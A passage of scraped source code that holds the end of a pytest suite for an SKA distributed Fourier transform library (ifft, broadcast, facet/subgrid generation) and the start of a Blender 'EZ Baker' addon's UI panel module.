axis=0)\n\n assert (\n result\n == numpy.array([[0, 0, 5, 0, 0], [0, 0, 5, 0, 0], [0, 0, 5, 0, 0]])\n ).all()\n\n\ndef test_ifft_2d_axis1():\n \"\"\"\n iFFT along axis=1\n \"\"\"\n array = numpy.array(\n [\n [0, 0, 0, 0, 0],\n [0, 0, 15, 0, 0],\n [0, 0, 0, 0, 0],\n ],\n dtype=complex,\n )\n\n result = ifft(array, axis=1)\n\n assert (\n result\n == numpy.array([[0, 0, 0, 0, 0], [3, 3, 3, 3, 3], [0, 0, 0, 0, 0]])\n ).all()\n\n\ndef test_ifft_2d_axis01():\n \"\"\"\n iFFT along axis=0 and axis=1\n \"\"\"\n array = numpy.array(\n [\n [0, 0, 0, 0, 0],\n [0, 0, 15, 0, 0],\n [0, 0, 0, 0, 0],\n ],\n dtype=complex,\n )\n result = ifft(ifft(array, axis=0), axis=1)\n\n assert (result == numpy.ones((3, 5))).all()\n\n\n@pytest.mark.parametrize(\n \"n, minimum, maximum\",\n [\n (8, -0.5, 0.375),\n (10, -0.5, 0.4),\n (23, -0.47826087, 0.47826087),\n (50, -0.5, 0.48),\n (100, -0.5, 0.49),\n (1000, -0.5, 0.499),\n ],\n)\ndef test_coordinates(n, minimum, maximum):\n \"\"\"\n Test values are chosen to illustrate how min and max\n values in the array change depending on the array length.\n \"\"\"\n result = coordinates(n)\n\n assert len(result) == n\n assert result[0].round(8) == round(minimum, 8)\n assert result[n // 2] == 0.0\n assert result[-1].round(8) == round(maximum, 8)\n\n\n@pytest.mark.parametrize(\n \"dims, axis, expected_shape\",\n [\n (0, 0, (10, 10)),\n (1, 0, (10, 10)),\n (2, 0, (10, 1, 10)),\n (3, 0, (10, 1, 1, 10)),\n (4, 0, (10, 1, 1, 1, 10)),\n (0, 1, (10, 10)),\n (1, 1, (1, 10, 10)),\n (2, 1, (1, 10, 10)),\n (3, 1, (1, 10, 1, 10)),\n (4, 1, (1, 10, 1, 1, 10)),\n (0, 2, (10, 10)),\n (1, 2, (1, 10, 10)),\n (2, 2, (1, 1, 10, 10)),\n (3, 2, (1, 1, 10, 10)),\n (4, 2, (1, 1, 10, 1, 10)),\n (0, 3, (10, 10)),\n (1, 3, (1, 10, 10)),\n (2, 3, (1, 1, 10, 10)),\n (3, 3, (1, 1, 1, 10, 10)),\n (4, 3, (1, 1, 1, 10, 10)),\n (5, 3, (1, 1, 1, 10, 1, 10)),\n (0, 3, (10, 10)),\n ],\n)\ndef test_broadcast(dims, axis, expected_shape):\n \"\"\"\n Provide a large set of cases to indicate how\n the shape of the input array changes\n with input dims-axis combinations.\n \"\"\"\n array = numpy.ones((10, 10))\n result = broadcast(array, dims, axis)\n assert result.shape == expected_shape\n\n\n@pytest.mark.parametrize(\n \"dims, axis\",\n [\n (1, (0, 1)),\n (2, (0, 2)),\n (3, (1, 1)),\n ((2, 4), 4),\n (\"str\", (3, 4)),\n ],\n)\ndef test_broadcast_raises_error(dims, axis):\n \"\"\"\n ValueError is raised when either dims or axis is not an integer.\n See docstring and test for create_slice.\n \"\"\"\n with pytest.raises(ValueError):\n broadcast(numpy.ones((10, 10)), dims, axis)\n\n\n@pytest.mark.parametrize(\n \"dims, axis, expected_tuple\",\n [\n (0, 0, ()), # if dims is 0, result is always an empty tuple\n (1, 0, (6,)), # range(1) --> 0, which equals to axis -> use axis_value\n (\n 1,\n 1,\n (2,),\n ), # range(1) --> 0, which doesn't equal to axis -> use fill_value\n (3, 2, (2, 2, 6)), # axis=2 (3rd value in tuple) is axis_val\n (6, 3, (2, 2, 2, 6, 2, 2)),\n ],\n)\ndef test_create_slice(dims, axis, expected_tuple):\n \"\"\"\n Test create_slice. 
See parametrize list for more info.\n \"\"\"\n fill_val = 2\n axis_val = 6\n result = create_slice(fill_val, axis_val, dims, axis)\n assert result == expected_tuple\n\n\n@pytest.mark.parametrize(\n \"dims, axis\",\n [(5, (0, 2)), ((2, 3), 4), ((2, 2), (0, 1)), (\"bla\", 5), (3, \"bla\")],\n)\ndef test_create_slice_raises_error(dims, axis):\n \"\"\"\n Only integers of dims and axis are allowed.\n While axis could be other things too, that would not have an\n effect, since in that case axis would never be in range(dims),\n hence we do not allow it in the code.\n \"\"\"\n with pytest.raises(ValueError):\n create_slice(2, 6, dims, axis)\n\n\n@pytest.mark.parametrize(\"use_dask\", [False, True])\ndef test_ith_subgrid_facet_element_axis_int(use_dask):\n \"\"\"\n Input array is one dimensional, i.e. the axis argument is an integer.\n Steps the code takes with example data in test:\n * input array: [13, 44, 12, 23, 33, 1, 53, 1234, 332, 54, 9]\n * roll by 2: [54, 9, 13, 44, 12, 23, 33, 1, 53, 1234, 332]\n * extract mid (5): [44, 12, 23, 33, 1]\n * masked: [0, 0, 23, 33, 1] ==> expected result\n \"\"\"\n image = numpy.array([13, 44, 12, 23, 33, 1, 53, 1234, 332, 54, 9])\n offset = 2\n true_size = 5\n mask = [0, 0, 1, 1, 1] # length of mask = true_size\n\n result = ith_subgrid_facet_element(\n image, offset, true_size, mask, axis=0, use_dask=use_dask, nout=1\n )\n if use_dask:\n result = dask.compute(result, sync=True)\n\n assert (result == numpy.array([0, 0, 23, 33, 1])).all()\n\n\n@pytest.mark.parametrize(\"use_dask\", [False, True])\ndef test_ith_subgrid_facet_element_axis_tuple(use_dask):\n \"\"\"\n Input array is two dimensional, i.e. the axis argument\n is a tuple of length two.\n\n Steps the code takes with example data in test:\n * input array:\n [[1, 44, 12, 23, 33],\n [13, 53, 1234, 332, 54],\n [123, -53, 32, -55, -452]]\n * roll by 1 along axis=0 and 3 along axis=1:\n [[32, -55, -452, 123, -53],\n [12, 23, 33, 1, 44],\n [332, 54, 13, 53, 1234]]\n * extract mid (5):\n [[-55, -452],\n [23, 33]]\n * masked:\n [[0, 0],\n [0, 33]] ==> expected result\n \"\"\"\n image = numpy.array(\n [\n [1, 44, 12, 23, 33],\n [13, 53, 1234, 332, 54],\n [123, -53, 32, -55, -452],\n ]\n )\n offset = (1, 3)\n true_size = 2\n mask = numpy.array([[0, 0], [0, 1]])\n\n result = ith_subgrid_facet_element(\n image, offset, true_size, mask, axis=(0, 1), use_dask=use_dask, nout=1\n )\n if use_dask:\n result = dask.compute(result, sync=True)\n\n assert (result == numpy.array([[0, 0], [0, 33]])).all()\n\n\n# pylint: disable=too-many-locals\ndef test_roll_and_extract_mid():\n \"\"\"\n For testing the roll+extract mid slice method\n \"\"\"\n N = 1 * 1024\n yB_size = 118\n test_data = numpy.arange(0, N * N).reshape(N, N)\n ch = yB_size\n offset_i = yB_size * numpy.arange(int(numpy.ceil(N / yB_size)))\n\n res = []\n for offx in offset_i:\n for offy in offset_i:\n test_roll = numpy.roll(test_data, (-offx, -offy), axis=(0, 1))\n true = extract_mid(extract_mid(test_roll, ch, 0), ch, 1)\n slicex, slicey = roll_and_extract_mid(\n N, offx, ch\n ), roll_and_extract_mid(N, offy, ch)\n test = numpy.empty((ch, ch), dtype=test_data.dtype)\n if len(slicex) <= len(slicey):\n iter_what1 = slicex\n iter_what2 = slicey\n else:\n iter_what1 = slicey\n iter_what2 = slicex\n\n pointx = [0]\n for sl in slicex:\n dt = sl.stop - sl.start\n pointx.append(dt + pointx[-1])\n\n pointy = [0]\n for sl in slicey:\n dt = sl.stop - sl.start\n pointy.append(dt + pointy[-1])\n\n for i0 in range(len(iter_what1)):\n for i1 in range(len(iter_what2)):\n if 
len(slicex) <= len(slicey):\n slice_block_x = slice(pointx[i0], pointx[i0 + 1])\n slice_block_y = slice(pointy[i1], pointy[i1 + 1])\n test[slice_block_x, slice_block_y] = test_data[\n slicex[i0], slicey[i1]\n ]\n else:\n slice_block_x = slice(pointx[i1], pointx[i1 + 1])\n slice_block_y = slice(pointy[i0], pointy[i0 + 1])\n test[slice_block_x, slice_block_y] = test_data[\n slicex[i1], slicey[i0]\n ]\n res.append((test == true).all())\n assert numpy.array(res).all()\n\n\ndef test_roll_and_extract_mid_axis():\n \"\"\"\n For testing the roll+extract mid slice method with a 2d data\n \"\"\"\n\n data = numpy.array(\n [\n [0, 1, 2, 3, 4],\n [5, 6, 7, 8, 9],\n [10, 11, 12, 13, 14],\n [15, 16, 17, 18, 19],\n [20, 21, 22, 23, 24],\n ]\n )\n\n offset = 3 # Trigger edge position\n true_usable_size = 2\n axis = 0\n true_block_data = numpy.array([[20, 21, 22, 23, 24], [0, 1, 2, 3, 4]])\n block_data = roll_and_extract_mid_axis(\n data, offset, true_usable_size, axis\n )\n assert (block_data == true_block_data).all()\n\n axis = 1 # Test 1th axis\n block_data = roll_and_extract_mid_axis(\n data, offset, true_usable_size, axis\n )\n true_block_data = numpy.array(\n [[4, 0], [9, 5], [14, 10], [19, 15], [24, 20]]\n )\n assert (block_data == true_block_data).all()\n\n\ndef test_make_facet_from_sources():\n \"\"\"\n Simple unit tests for make_facet_from_sources\n \"\"\"\n\n # Test shapes\n assert make_facet_from_sources([], 1, 1, [0]).shape == (1,)\n assert make_facet_from_sources([], 1, 2, [0]).shape == (2,)\n assert make_facet_from_sources([], 1, 1, [0, 0]).shape == (1, 1)\n assert make_facet_from_sources([], 1, 1, [0, 0, 0]).shape == (1, 1, 1)\n\n # Test a bunch of cases for small images\n def mffs(*xs):\n return list(make_facet_from_sources(*xs))\n\n assert mffs([], 1, 1, [0]) == [0]\n assert mffs([(1, 0)], 1, 1, [0]) == [1]\n assert mffs([(1, 2)], 1, 1, [0]) == [1]\n assert mffs([(1, 0)], 2, 1, [0]) == [1]\n assert mffs([(1, 1)], 2, 1, [0]) == [0]\n assert mffs([(1, 2)], 2, 1, [0]) == [1]\n assert mffs([(1, 0)], 2, 2, [0]) == [0, 1]\n assert mffs([(1, 1)], 2, 2, [0]) == [1, 0]\n assert mffs([(1, 2)], 2, 2, [0]) == [0, 1]\n assert mffs([(1, 0), (2, 1)], 2, 2, [0]) == [2, 1]\n assert mffs([(1, 0), (2, 3)], 2, 2, [0]) == [2, 1]\n assert mffs([(1, 0)], 2, 2, [1]) == [1, 0]\n assert mffs([(1, 1)], 2, 2, [1]) == [0, 1]\n assert mffs([(1, 2)], 2, 2, [1]) == [1, 0]\n assert mffs([(1, 0)], 2, 2, [-1]) == [1, 0]\n assert mffs([(1, 1)], 2, 2, [-1]) == [0, 1]\n assert mffs([(1, 2)], 2, 2, [-1]) == [1, 0]\n assert mffs([(1, 0)], 2, 2, [0], [[1, 0]]) == [0, 0]\n assert mffs([(1, 1)], 2, 2, [0], [[1, 0]]) == [1, 0]\n assert mffs([(1, 2)], 2, 2, [0], [[1, 0]]) == [0, 0]\n assert mffs([(1, 0)], 2, 2, [0], [[0, 1]]) == [0, 1]\n assert mffs([(1, 1)], 2, 2, [0], [[0, 1]]) == [0, 0]\n assert mffs([(1, 2)], 2, 2, [0], [[0, 1]]) == [0, 1]\n assert mffs([(1, 0)], 2, 2, [-1], [[1, 0]]) == [1, 0]\n assert mffs([(1, 1)], 2, 2, [-1], [[1, 0]]) == [0, 0]\n assert mffs([(1, 2)], 2, 2, [-1], [[1, 0]]) == [1, 0]\n assert mffs([(1, 0)], 2, 2, [1], [[0, 1]]) == [0, 0]\n assert mffs([(1, 1)], 2, 2, [1], [[0, 1]]) == [0, 1]\n assert mffs([(1, 2)], 2, 2, [1], [[0, 1]]) == [0, 0]\n\n\ndef test_make_subgrid_from_sources():\n \"\"\"\n Simple unit tests for make_subgrid_from_sources\n \"\"\"\n\n # Test shapes\n assert make_subgrid_from_sources([], 1, 1, [0]).shape == (1,)\n assert make_subgrid_from_sources([], 1, 2, [0]).shape == (2,)\n assert make_subgrid_from_sources([], 1, 1, [0, 0]).shape == (1, 1)\n assert make_subgrid_from_sources([], 1, 1, 
[0, 0, 0]).shape == (1, 1, 1)\n\n # Test a bunch of cases for small images\n def msfs(*xs):\n return pytest.approx(list(make_subgrid_from_sources(*xs)))\n\n assert msfs([(1, 0)], 1, 1, [0]) == [1]\n assert msfs([(1, 2)], 1, 1, [0]) == [1]\n assert msfs([(1, 0)], 2, 1, [0]) == [0.5]\n assert msfs([(1, 1)], 2, 1, [0]) == [0.5]\n assert msfs([(1, 2)], 2, 1, [0]) == [0.5]\n assert msfs([(1, 0)], 2, 1, [1]) == [0.5]\n assert msfs([(1, 1)], 2, 1, [1]) == [-0.5]\n assert msfs([(1, 2)], 2, 1, [1]) == [0.5]\n assert msfs([(1, 0)], 2, 2, [0]) == [0.5, 0.5]\n assert msfs([(1, 1)], 2, 2, [0]) == [-0.5, 0.5]\n assert msfs([(1, 2)], 2, 2, [0]) == [0.5, 0.5]\n assert msfs([(1, 0)], 2, 2, [1]) == [0.5, 0.5]\n assert msfs([(1, 1)], 2, 2, [1]) == [0.5, -0.5]\n assert msfs([(1, 2)], 2, 2, [1]) == [0.5, 0.5]\n assert msfs([(1, 0)], 2, 2, [-1]) == [0.5, 0.5]\n assert msfs([(1, 1)], 2, 2, [-1]) == [0.5, -0.5]\n assert msfs([(1, 2)], 2, 2, [-1]) == [0.5, 0.5]\n assert msfs([(1, 0)], 2, 2, [0], [[1, 0]]) == [0.5, 0]\n assert msfs([(1, 1)], 2, 2, [0], [[1, 0]]) == [-0.5, 0]\n assert msfs([(1, 2)], 2, 2, [0], [[1, 0]]) == [0.5, 0]\n assert msfs([(1, 0)], 2, 2, [0], [[0, 1]]) == [0, 0.5]\n assert msfs([(1, 1)], 2, 2, [0], [[0, 1]]) == [0, 0.5]\n assert msfs([(1, 2)], 2, 2, [0], [[0, 1]]) == [0, 0.5]\n assert msfs([(1, 0)], 2, 2, [-1], [[1, 0]]) == [0.5, 0]\n assert msfs([(1, 1)], 2, 2, [-1], [[1, 0]]) == [0.5, 0]\n assert msfs([(1, 2)], 2, 2, [-1], [[1, 0]]) == [0.5, 0]\n assert msfs([(1, 0)], 2, 2, [1], [[0, 1]]) == [0, 0.5]\n assert msfs([(1, 1)], 2, 2, [1], [[0, 1]]) == [0, -0.5]\n assert msfs([(1, 2)], 2, 2, [1], [[0, 1]]) == [0, 0.5]\n\n\ndef test_make_facet_subgrid_from_sources_1d():\n \"\"\"\n Test facet / subgrid generation from sources - thorough 1D version\n \"\"\"\n\n source_lists = [\n [],\n [(1, 0)],\n [(10, 0)],\n [(1, 0), (2, 0)],\n [(1, 1)],\n [(1, -4)],\n [(1, 10000)],\n [(1, -10000)],\n [(1, 10), (1, -20), (3, 2)],\n ]\n\n for sources, image_size, subgrid_offset, facet_offset in itertools.product(\n source_lists, [4, 8, 16, 32], [0, 5, -7], [0, 2, -3]\n ):\n\n # Generate \"sub\" grid and facet. We choose image and subgrid\n # size to be equal to entire image size so the results should\n # be precisely the FFT of each other (at an offset)\n subgrid = make_subgrid_from_sources(\n sources, image_size, image_size, [subgrid_offset]\n )\n facet = make_facet_from_sources(\n sources, image_size, image_size, [facet_offset]\n )\n\n # Sanity check\n assert numpy.sum(facet) == pytest.approx(\n sum(source[0] for source in sources)\n )\n\n # Roll to remove offsets\n subgrid = numpy.roll(subgrid, subgrid_offset)\n facet = numpy.roll(facet, facet_offset)\n\n # Check equal-ness and normalisation\n numpy.testing.assert_array_almost_equal(fft(subgrid, axis=0), facet)\n if sources == [(1, 0)]:\n numpy.testing.assert_array_almost_equal(subgrid, 1 / image_size)\n\n\ndef test_make_facet_subgrid_from_sources_2d():\n \"\"\"\n Test facet / subgrid generation from sources - less thorough 2D\n version (might get expensive)\n \"\"\"\n\n source_lists = [\n [],\n [(1, 0, 0)],\n [(10, 0, 0)],\n [(1, 0, 0), (2, 0, 0)],\n [(1, 1, 0)],\n [(1, -4, 0)],\n ]\n facet_sg_offsets = numpy.array([[0, 0], [0, 3], [0, -4], [2, 0], [1, 0]])\n\n for sources, image_size, subgrid_offset, facet_offset in itertools.product(\n source_lists, [4, 8, 16], facet_sg_offsets, facet_sg_offsets\n ):\n\n # Generate \"sub\" grid and facet. 
We choose image and subgrid\n # size to be equal to entire image size so the results should\n # be precisely the FFT of each other (at an offset)\n subgrid = make_subgrid_from_sources(\n sources, image_size, image_size, subgrid_offset\n )\n facet = make_facet_from_sources(\n sources, image_size, image_size, facet_offset\n )\n\n # Sanity check\n assert numpy.sum(facet) == pytest.approx(\n sum(source[0] for source in sources)\n )\n\n # Roll to remove offsets\n subgrid = numpy.roll(subgrid, subgrid_offset, axis=(0, 1))\n facet = numpy.roll(facet, facet_offset, axis=(0, 1))\n\n # Check equal-ness and normalisation\n numpy.testing.assert_array_almost_equal(\n fft(fft(subgrid, axis=0), axis=1), facet\n )\n if sources == [(1, 0, 0)]:\n numpy.testing.assert_array_almost_equal(\n subgrid, 1 / image_size / image_size\n )\n\n\ndef test_make_subgrid_and_facet_from_sources_function():\n \"\"\"\n Test the function make_facet_and_subgrid_from_sources\n \"\"\"\n\n image_size = 1024\n xA_size = 188\n yB_size = 256\n\n TEST_PARAMS = {\n \"W\": 13.25,\n \"fov\": 0.75,\n \"N\": image_size,\n \"Nx\": 4,\n \"yB_size\": yB_size,\n \"yN_size\": 320,\n \"yP_size\": 512,\n \"xA_size\": xA_size,\n \"xM_size\": 256,\n }\n\n base_arrays = BaseArrays(**TEST_PARAMS)\n\n sources = [(1, 0, 0)]\n\n subgrid, facet = make_subgrid_and_facet_from_sources(\n sources, base_arrays, use_dask=False\n )\n\n # Testing the shape\n assert subgrid.shape == (\n base_arrays.nsubgrid,\n base_arrays.nsubgrid,\n xA_size,\n xA_size,\n )\n assert facet.shape == (\n base_arrays.nfacet,\n base_arrays.nfacet,\n yB_size,\n yB_size,\n )\n\n # Testing the data\n assert abs(numpy.sum(facet[0, 0])) == 1.0\n\n subgrid = numpy.roll(subgrid, [0, 0], axis=(0, 1))\n ft_subgrid_0 = fft(fft(subgrid[0, 0], axis=0), axis=1)\n assert numpy.isclose(\n abs(numpy.sum(ft_subgrid_0)),\n 1.0 / (image_size / xA_size) ** 2,\n rtol=1e-13,\n )\n","repo_name":"ska-telescope/ska-sdp-distributed-fourier-transform","sub_path":"tests/test_fourier_algorithm.py","file_name":"test_fourier_algorithm.py","file_ext":"py","file_size_in_byte":25508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44686157578","text":"import bpy\nimport textwrap\n\nfrom bpy.props import (\n StringProperty,\n BoolProperty,\n IntProperty,\n FloatProperty,\n FloatVectorProperty,\n EnumProperty,\n PointerProperty,\n)\n\nfrom .settings import mode_group_types, devices_enum\nfrom . import outputs\nfrom . import baker\nfrom . import bake_group\nfrom . import operators\nfrom . import devices\nfrom . 
import handlers\nfrom .addon_updater import ops\n\nopen_folder_icon = 'FILE_FOLDER'\nif bpy.app.version >= (2, 83, 0):\n open_folder_icon = 'FOLDER_REDIRECT'\n\nis_baking = False\n\n\nclass EZB_preview_group_object(bpy.types.PropertyGroup):\n name: bpy.props.StringProperty()\n cage: bpy.props.StringProperty()\n\n\nclass EZB_Settings(bpy.types.PropertyGroup):\n bakers: bpy.props.CollectionProperty(type=baker.EZB_Baker)\n baker_index: bpy.props.IntProperty(update=handlers.update_group_objects_on_index_change)\n\n suffix_high: bpy.props.StringProperty(default=\"_high\")\n suffix_low: bpy.props.StringProperty(default=\"_low\")\n suffix_cage: bpy.props.StringProperty(default=\"_cage\")\n\n save_type: bpy.props.EnumProperty(items=[\n ('PACK', 'Internally', 'Pack images inside the .blend file'),\n ('EXTERNAL', 'Externally', 'Save images to an external file')\n ])\n\n preview_group_objects_high: bpy.props.CollectionProperty(type=EZB_preview_group_object)\n preview_group_objects_low: bpy.props.CollectionProperty(type=EZB_preview_group_object)\n\n preview_group_objects_high_index: bpy.props.IntProperty()\n preview_group_objects_low_index: bpy.props.IntProperty()\n\n\nclass EZB_PT_core_panel(bpy.types.Panel):\n bl_idname = \"EZB_PT_core_panel\"\n bl_label = \"General Settings\"\n bl_space_type = 'VIEW_3D'\n bl_region_type = 'UI'\n bl_category = \"EZ Baker\"\n bl_options = {'DEFAULT_CLOSED'}\n\n def draw(self, context):\n layout = self.layout\n col = layout.column(align=False)\n col.use_property_split = True\n col.use_property_decorate = False # No animation.\n\n col.prop(context.scene.EZB_Settings, \"suffix_high\", text=\"High\")\n col.prop(context.scene.EZB_Settings, \"suffix_low\", text=\"Low\")\n col.prop(context.scene.EZB_Settings, \"suffix_cage\", text=\"Cage\")\n\n\nclass EZB_UL_preview_group_objects(bpy.types.UIList):\n def draw_item(self, context, layout, data, item, icon, active_data, active_propname, index):\n sub_row = layout.row()\n sub_row.operator('ezb.select_object', text='', icon='RESTRICT_SELECT_OFF').name = item.name\n sub_row.label(text=item.name, icon='MESH_CUBE')\n\n baker = context.scene.EZB_Settings.bakers[context.scene.EZB_Settings.baker_index]\n bake_group = baker.bake_groups[baker.bake_group_index]\n\n if bake_group.mode_group == 'CUSTOM':\n op = sub_row.operator('ezb.remove_custom_object', text='', icon='REMOVE')\n\n op.scene = context.scene.name\n op.datapath = bake_group.path_from_id()\n op.is_high = True\n op.index = index\n\n\nclass EZB_UL_preview_group_objects_low(bpy.types.UIList):\n def draw_item(self, context, layout, data, item, icon, active_data, active_propname, index):\n sub_row = layout.row()\n sub_row.operator('ezb.select_object', text='', icon='RESTRICT_SELECT_OFF').name = item.name\n sub_row.label(text=item.name, icon='MESH_CUBE')\n if item.cage:\n sub_row.operator('ezb.select_object', text='', icon='SELECT_SET').name = item.cage\n else:\n sub_row.operator('ezb.create_custom_cage', text='', icon='ADD').name = item.name\n\n baker = context.scene.EZB_Settings.bakers[context.scene.EZB_Settings.baker_index]\n bake_group = baker.bake_groups[baker.bake_group_index]\n\n if bake_group.mode_group == 'CUSTOM':\n op = sub_row.operator('ezb.remove_custom_object', text='', icon='REMOVE')\n\n op.scene = context.scene.name\n op.datapath = bake_group.path_from_id()\n op.is_high = False\n op.index = index\n\n\nclass EZB_UL_bakers(bpy.types.UIList):\n def draw_item(self, context, layout, data, item, icon, active_data, active_propname, index):\n row = layout.row()\n 
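# pick the icon registered for this baker's device type (devices_enum rows are (identifier, name, description, icon, ...) tuples)\n        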
row.prop(item, 'key', text='', icon=next(x[3] for x in devices_enum if x[0] == item.device_type), emboss=False)\n\n\nclass EZB_UL_bake_groups(bpy.types.UIList):\n def draw_item(self, context, layout, data, item, icon, active_data, active_propname, index):\n row = layout.row()\n icon = next(x[3] for x in mode_group_types if x[0] == item.mode_group)\n\n selected = any(y.select_get() for y in item.objects_high) or any(y.select_get() for y in item.objects_low)\n selected_icon = 'RESTRICT_SELECT_ON' if not selected else 'RESTRICT_SELECT_OFF'\n\n row.label(text='', icon=selected_icon)\n row.prop(item, 'key', text='', icon=icon, emboss=False)\n\n high_objs = item.objects_high\n low_objs = item.objects_low\n if not data.child_device.use_low_to_low:\n row.operator('ezb.show_high_objects', text='High: {}'.format(len(high_objs)), emboss=False).index = index\n row.operator('ezb.show_low_objects', text='Low: {}'.format(len(low_objs)), emboss=False).index = index\n\n if not data.child_device.use_low_to_low:\n row.prop(\n item,\n 'preview_cage',\n text='cage',\n icon=\"HIDE_OFF\" if item.preview_cage else \"HIDE_ON\",\n icon_only=True,\n emboss=False\n )\n\n\nclass EZB_PT_baker_panel(bpy.types.Panel):\n bl_idname = \"EZB_PT_baker_panel\"\n bl_label = \"Bakers\"\n bl_space_type = 'VIEW_3D'\n bl_region_type = 'UI'\n bl_category = \"EZ Baker\"\n\n def draw(self, context):\n ops.check_for_update_background()\n ops.update_notice_box_ui(self, context)\n\n layout = self.layout\n\n ezb_settings = context.scene.EZB_Settings\n\n bakers = [x for x in ezb_settings.bakers]\n\n main_col = layout.column(align=True)\n row = main_col.row(align=True)\n\n row.template_list(\"EZB_UL_bakers\", \"\", ezb_settings, \"bakers\", ezb_settings, \"baker_index\", rows=2)\n col = row.column(align=True)\n col.operator('ezb.new_baker', text='', icon='ADD')\n col.operator('ezb.remove_baker', text='', icon='REMOVE')\n\n row = main_col.split(factor=0.8, align=True)\n # split=row.split(factor=0.75, align=True)\n row.scale_y = 1.5\n\n baker = None\n if (context.scene.EZB_Settings.baker_index < len(context.scene.EZB_Settings.bakers) and len(context.scene.EZB_Settings.bakers) > 0):\n baker = context.scene.EZB_Settings.bakers[context.scene.EZB_Settings.baker_index]\n rub_row = row.row(align=True)\n bake_button_text = 'Bake'\n if baker and baker.is_baking:\n rub_row.operator('ezb.cancel_bake', text='', icon='X')\n bake_button_text = baker.child_device.show_progress()\n bake_op = rub_row.operator('ezb.bake', text=bake_button_text, icon='IMPORT')\n\n path = ''\n row = row.row(align=True)\n row.enabled = False\n if baker:\n row.enabled = bool(baker.path)\n path = baker.path\n\n row.operator(\"wm.path_open\", text=\"Open\", icon=open_folder_icon).filepath = path\n\n if baker and baker.is_baking:\n layout.label(text=f'Baking: {baker.baking_map_name}...')\n\n row = layout.row()\n row.enabled = False\n\n if False:\n tooltip = operators.EZB_OT_bake.description(context, bake_op)\n if tooltip != 'Bake':\n text_wrap = textwrap.TextWrapper(width=50) # 50 = maximum length\n text_list = text_wrap.wrap(text=tooltip)\n\n # Now in the panel:\n for text in text_list:\n row = layout.row(align=True)\n row.alignment = 'CENTER'\n row.label(text=text)\n\n\nclass EZB_PT_baker_settings_panel(bpy.types.Panel):\n bl_idname = \"EZB_PT_baker_settings_panel\"\n bl_label = \"Baker Settings\"\n bl_space_type = 'VIEW_3D'\n bl_region_type = 'UI'\n bl_category = \"EZ Baker\"\n #bl_options = {'DEFAULT_CLOSED'}\n bl_parent_id = \"EZB_PT_baker_panel\"\n\n def draw(self, context):\n 
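# draw the selected baker's settings, or a hint when no baker has been created yet\n        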
layout = self.layout\n ezb_settings = context.scene.EZB_Settings\n bakers = [x for x in ezb_settings.bakers]\n baker_index = context.scene.EZB_Settings.baker_index\n\n if not(context.scene.EZB_Settings.baker_index < len(bakers) and len(bakers) > 0):\n layout.label(text='Select or create a Baker in the \"Bakers\" panel')\n return\n baker = context.scene.EZB_Settings.bakers[context.scene.EZB_Settings.baker_index]\n layout.enabled = not baker.is_baking\n\n col = layout.column(align=False)\n\n baker.draw(col, context)\n\n\nclass EZB_PT_bake_groups_panel(bpy.types.Panel):\n bl_idname = \"EZB_PT_bake_groups_panel\"\n bl_label = \"Bake Groups\"\n bl_space_type = 'VIEW_3D'\n bl_region_type = 'UI'\n bl_category = \"EZ Baker\"\n\n def draw(self, context):\n layout = self.layout\n\n ezb_settings = context.scene.EZB_Settings\n if not(context.scene.EZB_Settings.baker_index < len(ezb_settings.bakers) and len(ezb_settings.bakers) > 0):\n layout.label(text='Select or create a Baker in the \"Bakers\" panel')\n return\n baker = context.scene.EZB_Settings.bakers[context.scene.EZB_Settings.baker_index]\n\n # layout.enabled = not baker.is_baking\n\n col = layout.column(align=True)\n col.template_list(\"EZB_UL_bake_groups\", \"\", baker, \"bake_groups\", baker, \"bake_group_index\", rows=2)\n row2 = col.row(align=True)\n row2.operator_menu_enum('ezb.create_possible_bake_groups', 'gather_from', text='', icon='IMPORT')\n row2.operator_menu_enum('ezb.new_bake_group', 'name', text='Add Bake Group', icon='ADD')\n row2.operator('ezb.remove_bake_group', text='', icon='REMOVE')\n\n if len(baker.bake_groups) > baker.bake_group_index and baker.bake_group_index >= 0:\n bake_group = baker.bake_groups[baker.bake_group_index]\n if not baker.child_device.use_low_to_low:\n col = layout.column(align=True)\n row = col.row(align=True)\n row.prop(\n bake_group,\n 'preview_cage',\n text='',\n icon=\"HIDE_OFF\" if bake_group.preview_cage else \"HIDE_ON\",\n icon_only=True,\n emboss=False\n )\n row.prop(bake_group, 'cage_displacement')\n row.operator('ezb.edit_bake_groups', text='', icon='SHADERFX')\n\n layout = layout.split(factor=0.5, align=True)\n column = layout.column()\n if bake_group.mode_group == 'CUSTOM':\n column.prop(bake_group, 'object_high', text='High')\n column.template_list(\n \"EZB_UL_preview_group_objects\",\n \"\",\n ezb_settings,\n \"preview_group_objects_high\",\n ezb_settings,\n \"preview_group_objects_high_index\",\n rows=2,\n )\n column = layout.column()\n if bake_group.mode_group == 'CUSTOM':\n column.prop(bake_group, 'object_low', text='Low')\n column.template_list(\n \"EZB_UL_preview_group_objects_low\",\n \"\",\n ezb_settings,\n \"preview_group_objects_low\",\n ezb_settings,\n \"preview_group_objects_low_index\",\n rows=2,\n )\n\n\nclass EZB_PT_maps_panel(bpy.types.Panel):\n bl_idname = \"EZB_PT_maps_panel\"\n bl_label = \"Maps\"\n bl_space_type = 'VIEW_3D'\n bl_region_type = 'UI'\n bl_category = \"EZ Baker\"\n\n def draw(self, context):\n layout = self.layout\n\n ezb_settings = context.scene.EZB_Settings\n if not(context.scene.EZB_Settings.baker_index < len(ezb_settings.bakers) and len(ezb_settings.bakers) > 0):\n layout.label(text='Select or create a Baker in the \"Bakers\" panel')\n return\n baker = context.scene.EZB_Settings.bakers[context.scene.EZB_Settings.baker_index]\n col = layout.column(align=True)\n col.operator_menu_enum('ezb.add_map', 'map', text='Add Map', icon='ADD')\n baker.draw_maps(col, context)\n\n\nclass EZB_PT_output_panel(bpy.types.Panel):\n bl_idname = \"EZB_PT_output_panel\"\n 
